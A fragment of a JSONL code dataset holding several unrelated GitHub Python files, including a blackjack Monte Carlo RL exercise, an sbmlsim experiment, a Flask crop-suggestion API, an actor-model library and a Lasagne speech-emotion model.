\"--model_path\", type=str,\n default=\"\",\n help=\"model save path\")\n parser.add_argument(\"-e\", \"--epoch\", type=int,\n default=3,\n help=\"training_epoch\")\n parser.add_argument(\"-l\", \"--learning_rate\", type=float,\n default=8e-6,\n help=\"learning rate for classification task\")\n args = parser.parse_args()\n torch.manual_seed(1)\n config = config()\n train = pd.read_csv(args.dataset + \"/Weibo/train2.csv\")\n train = ClassifyDataset(train, max_length=config.max_length, device=config.device)\n\n train = DataLoader(train, batch_size=32, num_workers=0)\n print(args.epoch)\n print(args.learning_rate)\n trainer = Trainer(config=config, save_path=rootPath + args.model_path, epoch=int(train.dataset.data_size / train.batch_size) * args.epoch, lr=args.learning_rate)\n for e in range(args.epoch):\n trainer.train(train, e)\n trainer.save()\n trainer.sighan_eval()\n","repo_name":"ColeGroup/W2CSpace","sub_path":"driver/senti_classify.py","file_name":"senti_classify.py","file_ext":"py","file_size_in_byte":15883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1706620193","text":"\"\"\"\nExample simulation experiment.\n\"\"\"\nfrom pathlib import Path\nfrom typing import Dict, Union\n\nfrom sbmlsim.combine.sedml.report import Report\nfrom sbmlsim.data import Data\nfrom sbmlsim.experiment import ExperimentRunner, SimulationExperiment\nfrom sbmlsim.model import AbstractModel\nfrom sbmlsim.plot import Figure, Plot\nfrom sbmlsim.simulation import AbstractSim, Timecourse, TimecourseSim\nfrom sbmlsim.simulator.rr_simulator_ray import SimulatorParallel\nfrom sbmlsim.task import Task\n\n\nclass CurveTypesExperiment(SimulationExperiment):\n \"\"\"Simulation experiments for curve types.\"\"\"\n\n def models(self) -> Dict[str, Union[Path, AbstractModel]]:\n \"\"\"Define models.\"\"\"\n return {\n \"model\": Path(__file__).parent / \"results\" / \"curve_types_model.xml\",\n }\n\n def simulations(self) -> Dict[str, AbstractSim]:\n \"\"\"Define simulations.\"\"\"\n tc = TimecourseSim(\n timecourses=Timecourse(start=0, end=10, steps=10),\n time_offset=0,\n )\n return {\"tc\": tc}\n\n def tasks(self) -> Dict[str, Task]:\n \"\"\"Define tasks.\"\"\"\n tasks = dict()\n for model in [\"model\"]:\n tasks[f\"task_{model}_tc\"] = Task(model=model, simulation=\"tc\")\n return tasks\n\n def data(self) -> Dict[str, Data]:\n \"\"\"Define data generators.\"\"\"\n # direct access via id\n data = []\n for model in [\"model\"]:\n for selection in [\"time\", \"S1\", \"S2\", \"[S1]\", \"[S2]\"]:\n data.append(Data(task=f\"task_{model}_tc\", index=selection))\n return {d.sid: d for d in data}\n\n def reports(self) -> Dict[str, Report]:\n \"\"\"Define reports.\"\"\"\n report1 = Report(\n sid=\"report1\",\n datasets={\n sid: f\"task_model_tc__{sid}\"\n for sid in [\"time\", \"S1\", \"S2\", \"[S1]\", \"[S2]\"]\n },\n )\n return {report1.sid: report1}\n\n def figures(self) -> Dict[str, Figure]:\n \"\"\"Define figure outputs (plots).\"\"\"\n fig = Figure(\n experiment=self,\n sid=\"figure0\",\n name=\"Example curve type\",\n num_cols=1,\n num_rows=1,\n width=5,\n height=5,\n )\n\n # FIXME: add helper to easily create figure layouts with plots\n p0 = fig.add_subplot(Plot(sid=\"plot0\", name=\"Timecourse\"), row=1, col=1)\n p0.set_title(f\"Timecourse\")\n p0.set_xaxis(\"time\", unit=\"min\")\n p0.set_yaxis(\"data\", unit=\"mM\")\n\n p0.curve(\n x=Data(\"time\", task=f\"task_model_tc\"),\n y=Data(\"[S1]\", task=f\"task_model_tc\"),\n label=f\"[S1]\",\n )\n\n return {\n fig.sid: fig,\n }\n\n\ndef run_curve_types_experiments(output_path: Path) -> Path:\n \"\"\"Run simulation experiments.\"\"\"\n base_path = Path(__file__).parent\n data_path = base_path\n\n runner = ExperimentRunner(\n CurveTypesExperiment,\n simulator=SimulatorParallel(),\n data_path=data_path,\n base_path=base_path,\n )\n _results = runner.run_experiments(\n output_path=output_path / \"results\", show_figures=True\n )\n\n\nif __name__ == \"__main__\":\n run_curve_types_experiments(Path(__file__).parent / \"results\")\n","repo_name":"matthiaskoenig/sbmlsim","sub_path":"src/sbmlsim/examples/experiments/curve_types/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"13189694884","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n# 0 means hit aka pick cards\n# 1 means stick aka stop picking cards\npolicy_player = np.zeros(22, dtype=np.int)\npolicy_player[20:] = 1\n\npolicy_dealer = np.zeros(22, dtype=np.int)\npolicy_dealer[17:] = 1\n\n# picking an ace gives value as 11\n# picking face cards give value as 10\nall_card_values_with_usable_ace = np.array([11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10])\n\ndef comp(a, b):\n return int(a > b) - int(a < b)\n\ndef initialize(initial_state=None):\n if initial_state is not None:\n player_card_sum, player_usable_ace, dealer_card_face_up = initial_state\n dealer_card_2 = np.random.choice(all_card_values_with_usable_ace)\n dealer_card_sum = dealer_card_face_up + dealer_card_2\n dealer_usable_ace = (11 in [dealer_card_face_up, dealer_card_2])\n if dealer_card_sum > 21:\n dealer_card_sum -= 10\n state = initial_state\n player_card_history = []\n else:\n player_card_sum, dealer_card_sum = 0, 0\n player_usable_ace, dealer_usable_ace = False, False\n player_card_history = []\n\n while player_card_sum < 12:\n card = np.random.choice(all_card_values_with_usable_ace)\n player_card_sum += card\n\n if player_card_sum > 21:\n # the previous sum would have been 11 before adding a new card\n # (since if previous sum is < 11 (suppose 10), then new sum is at max 21\n # as 11 is the card with the highest value, which doesn't violate the condition)\n # the new card has to be 11 for sum to exceed 21, which makes the new sum as 22\n # this makes us go bust, and thus, the last ace's value should be taken as 1\n player_card_sum -= 10\n else:\n player_usable_ace = player_usable_ace | (card == 11)\n \n dealer_initial_cards = np.random.choice(all_card_values_with_usable_ace, 2)\n dealer_card_sum += np.sum(dealer_initial_cards)\n dealer_usable_ace = dealer_usable_ace | (11 in dealer_initial_cards)\n\n if dealer_card_sum > 21:\n dealer_card_sum -= 10\n\n dealer_card_face_up = np.random.choice(dealer_initial_cards)\n state = (player_card_sum, player_usable_ace, dealer_card_face_up)\n\n return player_card_sum, dealer_card_sum, player_usable_ace, dealer_usable_ace, dealer_card_face_up, state, player_card_history\n\ndef simulate_player_turn(state, player_card_history, policy=None, initial_action=None, **kwargs):\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n\n while True:\n if initial_action is not None:\n action = initial_action\n initial_action = None\n else:\n if policy is None:\n action = policy_player[player_card_sum]\n else:\n action = policy(player_card_sum, player_usable_ace, dealer_card_face_up, **kwargs)\n \n new_state = (player_card_sum, player_usable_ace, dealer_card_face_up)\n player_card_history.append([new_state, action])\n\n # stick\n if action == 1:\n return 'stick', player_card_sum, new_state, player_card_history\n \n # hit\n else:\n card = np.random.choice(all_card_values_with_usable_ace)\n num_aces = 1 if player_usable_ace else 0\n if card == 11:\n num_aces += 1\n player_card_sum += card\n\n while player_card_sum > 21 and num_aces > 0:\n player_card_sum -= 10\n num_aces -= 1\n\n if player_card_sum > 21:\n reward = -1\n return state, reward, player_card_history\n \n if num_aces == 1:\n player_usable_ace = True\n else:\n player_usable_ace = False\n\ndef simulate_dealer_turn(state, dealer_card_sum, dealer_usable_ace, player_card_history):\n while True:\n action = policy_dealer[dealer_card_sum]\n\n # stick\n if action == 1:\n return 'stick', dealer_card_sum, state, player_card_history\n \n # hit\n else:\n card = np.random.choice(all_card_values_with_usable_ace)\n num_aces = 1 if dealer_usable_ace else 0\n if card == 11:\n num_aces += 1\n dealer_card_sum += card\n\n while dealer_card_sum > 21 and num_aces > 0:\n dealer_card_sum -= 10\n num_aces -= 1\n\n if dealer_card_sum > 21:\n reward = 1\n return state, reward, player_card_history\n \n if num_aces == 1:\n dealer_usable_ace = True\n else:\n dealer_usable_ace = False\n \ndef simulate_play(policy=None, initial_state=None, initial_action=None, **kwargs):\n player_card_sum, dealer_card_sum, player_usable_ace, \\\n dealer_usable_ace, dealer_card_face_up, \\\n state, player_card_history = initialize(initial_state)\n\n player_turn_result = simulate_player_turn(state, player_card_history, policy, initial_action, **kwargs)\n if len(player_turn_result) == 4:\n _, player_card_sum, state, player_card_history = player_turn_result\n else:\n return player_turn_result\n\n dealer_turn_result = simulate_dealer_turn(state, dealer_card_sum, dealer_usable_ace, player_card_history)\n if len(dealer_turn_result) == 4:\n _, dealer_card_sum, state, player_card_history = dealer_turn_result\n else:\n return dealer_turn_result\n\n reward = comp(player_card_sum, dealer_card_sum)\n return state, reward, player_card_history\n\ndef argmax_policy(player_card_sum, player_usable_ace, dealer_card_face_up, **kwargs):\n state_actions = kwargs['state_actions']\n state_actions_count = kwargs['state_actions_count']\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n state_action_values = state_actions[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, :] / \\\n state_actions_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, :]\n max_state_action_value = np.amax(state_action_values)\n all_actions_with_max_value = [i for i, a in enumerate(state_action_values) if a == max_state_action_value]\n return np.random.choice(all_actions_with_max_value)\n\ndef MC_on_policy(num_episodes):\n states = np.zeros((2, 10, 10))\n states_ace_count = np.ones((2, 10, 10))\n\n for i in range(num_episodes):\n _, reward, player_history = simulate_play()\n for (state, _) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n states_ace_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1] += 1\n states[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1] += reward\n \n return states / states_ace_count\n\ndef MC_ES(num_episodes):\n state_actions = np.zeros((2, 10, 10, 2))\n state_actions_count = np.full((2, 10, 10, 2), 1)\n \n for i in range(num_episodes):\n random_usable_ace = bool(np.random.choice([0, 1]))\n random_player_card_sum = np.random.choice(np.arange(12, 22))\n random_dealer_card_face_up = np.random.choice(all_card_values_with_usable_ace)\n random_initial_state = (random_player_card_sum, random_usable_ace, random_dealer_card_face_up)\n random_initial_action = np.random.choice([0, 1])\n\n if i==0:\n policy = None\n else:\n policy = argmax_policy\n \n _, reward, player_history = simulate_play(policy, random_initial_state, random_initial_action, **{'state_actions': state_actions, 'state_actions_count': state_actions_count})\n for (state, action) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n state_actions[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, action] += reward\n state_actions_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, action] += 1\n \n return state_actions / state_actions_count\n\ndef MC_off_policy(num_episodes):\n def behaviour_policy_for_player(player_card_sum, player_usable_ace, dealer_card_face_up):\n coin_toss = np.random.binomial(1, 0.5)\n if coin_toss == 1:\n return 1\n else:\n return 0\n\n initial_state = (13, True, 2)\n\n all_ratios = np.zeros(num_episodes)\n all_returns = np.zeros(num_episodes)\n\n for i in range(num_episodes):\n _, reward, player_history = simulate_play(behaviour_policy_for_player, initial_state)\n num, den = 1, 1\n for (state, action) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n target_action = policy_player[player_card_sum]\n if action == target_action:\n den *= 0.5\n else:\n num = 0\n break\n all_ratios[i] = num / den\n all_returns[i] = reward\n\n weighted_returns = np.cumsum(all_ratios * all_returns)\n all_ratios = np.cumsum(all_ratios)\n T_S = np.arange(1, num_episodes+1)\n\n ordinary_sampling = weighted_returns / T_S\n weighted_sampling = np.where(all_ratios!=0, weighted_returns / all_ratios, 0)\n\n return ordinary_sampling, weighted_sampling\n\ndef fig_1():\n states_1 = MC_on_policy(10000)\n states_2 = MC_on_policy(500000)\n\n titles = ['Usable Ace, 10000 Episodes',\n 'Usable Ace, 500000 Episodes',\n 'No Usable Ace, 10000 Episodes',\n 'No Usable Ace, 500000 Episodes']\n\n states_order = [states_1[1], states_2[1], states_1[0], states_2[0]]\n\n fig, ax = plt.subplots(2, 2, figsize=(40, 30), subplot_kw={'projection': '3d'})\n plt.subplots_adjust(wspace=0.1, hspace=0.2)\n \n card_labels = ['A']\n card_labels.extend(range(2, 11, 1))\n for i in range(2):\n for j in range(2):\n index = i*2 + j\n xs, ys = np.meshgrid(range(10), range(10))\n ax[i, j].set_zlim(-1, 1)\n ax[i, j].set_xticks(ticks=range(0, 10, 1))\n ax[i, j].set_xticklabels(card_labels)\n ax[i, j].set_yticks(ticks=range(0, 10, 1))\n ax[i, j].set_yticklabels(range(12, 22, 1))\n ax[i, j].set_xlabel('Dealer Showing')\n ax[i, j].set_ylabel('Player Sum')\n ax[i, j].set_title(titles[index])\n ax[i, j].plot_surface(xs, ys, states_order[index], rstride=1, cstride=1, cmap='hot')\n \n plt.show()\n\ndef fig_2():\n state_action_values = MC_ES(500000)\n\n state_action_values_non_usable_ace = state_action_values[0]\n state_action_values_usable_ace = state_action_values[1]\n\n state_values_non_usable_ace = np.amax(state_action_values_non_usable_ace, axis=2)\n state_values_usable_ace = np.amax(state_action_values_usable_ace, axis=2)\n \n action_non_usable_ace = np.argmax(state_action_values_non_usable_ace, axis=2)\n action_usable_ace = np.argmax(state_action_values_usable_ace, axis=2)\n\n plots = [action_usable_ace, state_values_usable_ace, action_non_usable_ace, state_values_non_usable_ace]\n\n card_labels = ['A']\n card_labels.extend(range(2, 11, 1))\n xs, ys = np.meshgrid(range(10), range(10))\n\n fig = plt.figure()\n ax = fig.add_subplot(2, 2, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(21, 11, -1))\n ax.set_title('Usable Ace PI*')\n ax.imshow(np.flipud(plots[0]), cmap='YlGnBu')\n\n ax = fig.add_subplot(2, 2, 2, projection='3d')\n ax.set_zlim(-1, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(12, 22, 1))\n ax.set_xlabel('Dealer Showing')\n ax.set_ylabel('Player Sum')\n ax.set_title('Usable Ace V*')\n ax.plot_surface(xs, ys, plots[1], rstride=1, cstride=1, cmap='hot')\n\n ax = fig.add_subplot(2, 2, 3)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(21, 11, -1))\n ax.set_title('No Usable Ace PI*')\n ax.imshow(np.flipud(plots[2]), cmap='YlGnBu')\n\n ax = fig.add_subplot(2, 2, 4, projection='3d')\n ax.set_zlim(-1, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(12, 22, 1))\n ax.set_xlabel('Dealer Showing')\n ax.set_ylabel('Player Sum')\n ax.set_title('No Usable Ace V*')\n ax.plot_surface(xs, ys, plots[3], rstride=1, cstride=1, cmap='hot')\n\n plt.show()\n\ndef fig_3():\n np.random.seed(42)\n true_val = -0.27726\n num_episodes = 10000\n num_runs = 100\n\n ordinary_sampling_errors = np.zeros(num_episodes)\n weighted_sampling_errors = np.zeros(num_episodes)\n\n for each_run in range(num_runs):\n ordinary_sampling, weighted_sampling = MC_off_policy(num_episodes)\n ordinary_error = np.power(ordinary_sampling - true_val, 2)\n weighted_error = np.power(weighted_sampling - true_val, 2)\n ordinary_sampling_errors += ordinary_error\n weighted_sampling_errors += weighted_error\n\n ordinary_sampling_errors /= num_runs\n weighted_sampling_errors /= num_runs\n\n plt.figure()\n plt.plot(ordinary_sampling_errors, label='Ordinary Importance Sampling')\n plt.plot(weighted_sampling_errors, label='Weighted Importance Sampling')\n plt.xlabel('Episodes (log scale)')\n plt.ylabel('Mean square error')\n plt.xscale('log')\n plt.legend(loc='best')\n plt.ylim([-0.5, 8])\n plt.show()\n\nif __name__ == '__main__':\n fig_1()\n fig_2()\n fig_3()","repo_name":"madhur-tandon/RL-2019","sub_path":"HW3/2016053_Q4.py","file_name":"2016053_Q4.py","file_ext":"py","file_size_in_byte":13981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"750193258","text":"numbers = list(map(float,input().split()))\np = numbers[0] / (numbers[0] + numbers[1])\nn = 6\n\ndef factorial(n):\n if n==1 or n==0:\n return 1\n elif n>1:\n return factorial(n-1)*n\n\ndef binomial(x,n,p):\n f = factorial(n) / (factorial(n-x) * factorial(x))\n return (f * p**x * (1.0 - p)**(n-x))\n\n\nresult = binomial(3,n,p) + binomial(4,n,p) + binomial(5,n,p) + binomial(6,n,p)\nprint(round(result,3))","repo_name":"mayraguajardo/10-Days-of-Statistics-HackerRank","sub_path":"binomial_distribution_1.py","file_name":"binomial_distribution_1.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12393094298","text":"from flask import Flask, request, render_template, jsonify\r\nimport client\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/join', methods=['GET','POST'])\r\ndef my_form_post():\r\n lat_in = request.form['lat']\r\n #word = request.args.get('lat')\r\n long_in = request.form['lon']\r\n district=request.form['district']\r\n area=request.form['area']\r\n\r\n res = client.suggest_crops(lat_in,long_in,district,area)\r\n \r\n result = {\r\n \"output\": res\r\n }\r\n result = {str(key): value for key, value in result.items()}\r\n return jsonify(result=result)\r\n\r\n@app.route('/api', methods=['POST'])\r\ndef my_api_post(): \r\n request_data=request.get_json() \r\n\r\n lat_in = float(request_data['lat'])\r\n #word = request.args.get('lat')\r\n long_in = float(request_data['lon'])\r\n district=request_data['district']\r\n area=float(request_data['area'])\r\n if(lat_in<9.9477 or lat_in >20.0210 or long_in<70.8157 or long_in > 85.1463):\r\n return jsonify({\"error\" : \"Coordinates out of range\"})\r\n res = client.suggest_crops(lat_in,long_in,district,area)\r\n \r\n result = {\r\n \"output\": res\r\n }\r\n \r\n result = {str(key): value for key, value in result.items()}\r\n return jsonify(result=result)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"Dhruvvvx17/Capstone-Project","sub_path":"Review3Capstone2/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3825831748","text":"#! /usr/bin/env python\n'''\nAn simple implementation of the Actor model.\n'''\n\nimport logging\nimport inspect\nfrom collections import deque, defaultdict\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nglobal_actors = set()\nglobal_actors_by_id = defaultdict(dict)\nglobal_event_queue = deque()\nglobal_callbacks = defaultdict(set)\n\n# Messages that can be emitted by Actors\nKILL = object() # Kill an actor\nHALT = object() # Halt the main loop\n\n# Messages that can be emitted by Director\nINITIATE = object() # First action when the loop starts\nFINISH = object() # Las action before the loop ends\n\n# Special on values\nANY = object() # @on(ANY) trigger for any message\n\n\ndef reset():\n '''Reset simpleactors global registries.'''\n global_actors.clear()\n global_actors_by_id.clear()\n global_event_queue.clear()\n global_callbacks.clear()\n\n\ndef get_by_id(class_, uid):\n '''Return an object by it's id'''\n return global_actors_by_id[class_].get(uid, None)\n\n\ndef on(message):\n '''Decorator that register a class method as callback for a message.'''\n def decorator(function):\n try:\n function._callback_messages.append(message)\n except AttributeError:\n function._callback_messages = [message]\n return function\n return decorator\n\n\nclass Actor:\n\n '''An actor that reacts to events.\n\n Args:\n auto_plug - if True (default) the actor will automatically plug itself\n into the mail event loop.\n '''\n\n def __init__(self, uid=None, auto_plug=True):\n self.id = id(self) if uid is None else uid\n global_actors.add(self)\n if self.id in global_actors_by_id[self.__class__]:\n msg = 'A \"{}\" instance with id \"{}\" has been already created.'\n raise ValueError(msg.format(self.__class__, self.id))\n global_actors_by_id[self.__class__][self.id] = self\n self.__plugged = False\n if auto_plug:\n self.plug()\n\n def plug(self):\n '''Add the actor's methods to the callback registry.'''\n if self.__plugged:\n return\n for _, method in inspect.getmembers(self, predicate=inspect.ismethod):\n if hasattr(method, '_callback_messages'):\n for message in method._callback_messages:\n global_callbacks[message].add(method)\n self.__plugged = True\n\n def unplug(self):\n '''Remove the actor's methods from the callback registry.'''\n if not self.__plugged:\n return\n members = set([method for _, method\n in inspect.getmembers(self, predicate=inspect.ismethod)])\n for message in global_callbacks:\n global_callbacks[message] -= members\n self.__plugged = False\n\n @property\n def is_plugged(self):\n '''Return True if the actor is listening for messages.'''\n return self.__plugged\n\n def emit(self, message, *args, **kwargs):\n '''Emit an event.'''\n global_event_queue.append((message, self, args, kwargs))\n\n\nclass Director(Actor):\n\n '''Orchestrate all actors.'''\n\n def process_event(self, event):\n message, emitter, args, kwargs = event\n for callback in global_callbacks[message]:\n callback(message, emitter, *args, **kwargs)\n for callback in global_callbacks[ANY]:\n callback(message, emitter, *args, **kwargs)\n\n def run(self):\n '''Run until there are no events to be processed.'''\n # We left-append rather than emit (right-append) because some message\n # may have been already queued for execution before the director runs.\n global_event_queue.appendleft((INITIATE, self, (), {}))\n while global_event_queue:\n self.process_event(global_event_queue.popleft())\n\n @property\n def actors(self):\n ret = global_actors.copy()\n ret.remove(self)\n return ret\n\n @on(KILL)\n def kill(self, event, emitter, target, **kwargs):\n target.unplug()\n global_actors.remove(target)\n\n @on(HALT)\n def halt(self, message, emitter, *args, **kwargs):\n '''Halt the execution of the loop.'''\n self.process_event((FINISH, self, (), {}))\n global_event_queue.clear()\n","repo_name":"quasipedia/simpleactors","sub_path":"simpleactors.py","file_name":"simpleactors.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16863287969","text":"import theano\nfrom theano import tensor as T\nfrom theano import config\nimport lasagne\nfrom lasagne.layers import DenseLayer,DimshuffleLayer,get_output, DropoutLayer, ReshapeLayer, InputLayer, MergeLayer,FlattenLayer,LSTMLayer, Conv1DLayer,ConcatLayer\nfrom lasagne.objectives import categorical_crossentropy, aggregate,binary_crossentropy,binary_accuracy,categorical_accuracy\n\nimport numpy as np\nfrom lasagne import utils\nlasagne.random.set_rng(numpy.random.RandomState(123))\nclass attention_reduce_layer(MergeLayer):\n\tdef\t__init__(self,input,attention,mask,**kwargs):\n\t\tsuper(attention_reduce_layer,self).__init__([input,attention,mask],**kwargs)\n\t\t#self.mask=mask\n\tdef get_output_shape_for(self,input_shapes):\n\t\tin1_shape,in2_shape,mask_shape=input_shapes\n\t\treturn (in1_shape[0],in1_shape[2])\n\tdef get_output_for(self,inputs,deterministic=False,**kwargs):\n\t\tinput, attention,mask=inputs### input.shape=(batchsize,timestep,featdim) attention.shape=(batchsize,featuredim,timestep)\n\t\tweight=attention.sum(axis=1)\n\t\tweight=T.exp(weight-weight.max(axis=1,keepdims=True))\n\t\tweight=weight*mask\n\t\tweight=weight/weight.sum(axis=1,keepdims=True)\n\t\treturn (input*weight[:,:,None]).sum(axis=1)\n\t\t\ndef model_build():\n\tx = T.tensor3('x', dtype=config.floatX)\n\tm = T.matrix('mask',dtype=config.floatX)\n\ty = T.vector('y',dtype='int32')\n\tg = T.vector('y',dtype='int32')\n\toutput=InputLayer(shape=(None,None,64),input_var=x)\n\tmask=InputLayer(shape=(None,None),input_var=m)\n\tmask=DimshuffleLayer(mask,(1,0))\n\toutput=DenseLayer(output,num_units=32,num_leading_axes=2)\n\t\n\toutput=ReshapeLayer(output,([1],[2],[0]))\n\toutput=Conv1DLayer(output,32,11,pad='same')\n\toutput=ReshapeLayer(output,([0],[2],[1]))\n\t\n\t\n\toutput_fw=LSTMLayer(output,32,peepholes=False,mask_input=mask)\n\toutput_bw=LSTMLayer(output,32,peepholes=False,backwards=True,mask_input=mask)\n\t\n\toutput_fw_attention=ReshapeLayer(output_fw,([0],[2],[1]))\n\tattention_fw=Conv1DLayer(output_fw_attention,12,11,pad='same')\n\toutput_fw=attention_reduce_layer(output_fw,attention_fw,mask)\n\t\n\toutput_bw_attention=ReshapeLayer(output_bw,([0],[2],[1]))\n\tattention_bw=Conv1DLayer(output_bw_attention,12,11,pad='same')\n\toutput_bw=attention_reduce_layer(output_bw,attention_bw,mask)\n\t\n\toutput=ConcatLayer([output_fw,output_bw],axis=1)\n\tout=DenseLayer(output,num_units=4,nonlinearity=T.nnet.softmax)\n\tmw=DenseLayer(output,num_units=1,nonlinearity=lasagne.nonlinearities.sigmoid)\n\tout_predictions,mw_predictions=get_output([out,mw])\n\tloss=categorical_crossentropy(out_predictions,y)\n\tloss = aggregate(loss, mode='mean')\n\tmw_loss=binary_crossentropy(mw_predictions,g)\n\tmw_loss=aggregate(mw_loss,mode='mean')\n\ttotal_loss=loss+mw_loss\n\t\n\toutput_params=lasagne.layers.get_all_params(output, trainable=True) \n\tout_params = output_params+out.get_params()\n\tmw_params = output_params+mw.get_params()\n\tparams = output_params+mw.get_params()+ out.get_params()\n\t\n\tupdates_mw= lasagne.updates.adadelta(mw_loss, mw_params)\n\tupdates_class= lasagne.updates.adadelta(loss, out_params)\t\t\t\t\t\t\t\t \n\tupdates = lasagne.updates.adadelta(total_loss, params)\n\t\t\t\t\t\t\t\t\t\t \n\tout_predictions_deterministic,mw_predictions_deterministic=get_output([out,mw], deterministic=True)\n\t\n\ttrain_fn=theano.function([x,m,y,g],total_loss,updates=updates)\n\ttrain_mw_fn=theano.function([x,m,g],mw_loss,updates=updates_mw)\n\ttrain_class_fn=theano.function([x,m,y],loss,updates=updates_class)\n\t\n\tmw_acc=binary_accuracy(mw_predictions_deterministic,g)\n\tmw_acc=aggregate(mw_acc,mode='mean')\n\t\n\tclass_acc=categorical_accuracy(out_predictions_deterministic,y)\n\tclass_acc=aggregate(class_acc,mode='mean')\n\t\n\ttest_class_fn=theano.function([x,m,y],class_acc)\n\ttest_mw_fn=theano.function([x,m,g],mw_acc)\n\t\n\treturn train_fn, train_mw_fn,train_class_fn, test_class_fn,test_mw_fn,params\n\t\n\t\ntrain_fn, train_mw_fn,train_class_fn, test_class_fn,test_mw_fn,params=model_build()\nfrom new import datagenerate\ndatagene=datagenerate(portion2train=0.8)\t\n##################### params setting ######################\nuidx =0\nmax_epochs=50\ncost_list=[]\nerror_list=[]\npatient=10\nlrate=0.0001\nbad_counter = 0\nestop=False\nload_params=False\nif load_params:\n\tparams.load()\n#####################################################\nfor eidx in range(max_epochs):\n\tfor (x,mask),y,g in datagene.train_iterate():\n\t\tuidx+=1\n\t\tcost= train_fn(x,mask,y,g)\n\t\tcost_list.append(cost)\n\t\tif np.mod(uidx,10)==0:\n\t\t\tprint(\"%d update,cost:%.4f\" % (uidx,cost))\n\t\tif np.mod(uidx,100)==0:\n\t\t\tsum=0;\n\t\t\tnum=0\n\t\t\tfor (x,m),y,g in datagene.test_iterate():\n\t\t\t\tsum+=test_class_fn(x,m,y)*len(y)\n\t\t\t\tnum+=len(y)\n\t\t\trr=sum/float(num)\n\t\t\terror_list.append(rr)\n\t\t\tprint(\"recognition rate:%.4f\"%rr)\n\t\t\t#print(error_list)\n\t\t\tif len(error_list)!=1 and rr > np.array(error_list[:-1]).max():\n\t\t\t\tbad_counter=0\n\t\t\t\tprint('save the parameter!')\n\t\t\t\tnp.savez('net_params',params)#params.save()\n\t\t\tif len(error_list)>patient and rr<= np.array(error_list)[-patient:].max():\n\t\t\t\tbad_counter+=1\n\t\t\t\tif bad_counter > patient:\n\t\t\t\t\tprint(\"Early stop\")\n\t\t\t\t\testop=True\n\t\t\t\t\tbreak\n\tif\testop==True:\n\t\tbreak\nprint(\"best recognition rate %.4f\"%np.array(error_list).max())","repo_name":"stevexiaofei/Speech-emotion-recognition","sub_path":"emorec.py","file_name":"emorec.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35372223015","text":"prix=float(input('entrez le prix hors taxes :'))\r\ntva = 18.6\r\nremise=0\r\nif 1000<=prix<2000 :\r\n print(\"Prix HT sans réduction : \", prix, \"€\")\r\n print(\"Taux de réduction : 1 %\")\r\n remise=0.09\r\nelif 2000<=prix<5000 :\r\n print(\"Prix HT sans réduction : \", prix, \"€\")\r\n print(\"Taux de réduction : 3 %\")\r\n remise=0.07\r\nelif prix>=5000 :\r\n print(\"Prix HT sans réduction : \", prix , \"€\")\r\n print(\"Taux de réduction : 5 %\")\r\n remise=0.05\r\n\r\nnouveauprix = prix * remise\r\nTIC= nouveauprix*(1+tva/100)\r\nprint(\"Prix HT avec réduction : \", TIC, \"€\")","repo_name":"Chaima-LGDOUR/tp-python","sub_path":"pycharm/Exo3.py","file_name":"Exo3.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74605329061","text":"\"\"\"AoC 2015.09 problem solver.\n\nTakes input from STDIN by default.\n\n(c) Alexander Kashev, 2017\n\"\"\"\nimport sys\nfrom math import factorial\nimport re\n\n\ndef permute(list, index):\n \"\"\"\n Return index-th permutation of a list.\n\n Keyword arguments:\n list --- the list to be permuted\n index --- index in range (0, factorial(len(list)))\n \"\"\"\n if len(list) < 2:\n return list\n (rest, choice) = divmod(index, len(list))\n return [list[choice]] + permute(list[0:choice] + list[choice + 1:len(list)], rest)\n\n\ndef distance(route, graph):\n 